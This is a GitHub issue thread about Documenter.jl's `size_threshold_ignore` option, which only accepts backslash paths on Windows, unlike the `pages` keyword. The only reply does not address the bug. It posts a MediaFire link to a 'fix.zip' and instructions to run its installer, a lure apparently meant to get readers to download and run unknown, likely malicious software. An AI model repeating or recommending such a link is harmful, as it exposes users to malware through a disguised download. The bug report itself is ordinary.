### ISSUE TITLE
cross-platform `size_threshold_ignore`

### ISSUE THREAD

**Issue by ArnoStrouwen** [JuliaDocs/Documenter.jl#2560]
When specifying `size_threshold_ignore` as `my_folder/my_file.md` on Windows, I still get errors about the file being too large.
These errors go away if I use `my_folder\\my_file.md` instead.

This is different from the behavior of the `pages` keyword of `makedocs`, which is cross-platform, and it would be nice if the exact same string could be used for both keywords.

**Comment by IvanJrX** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."
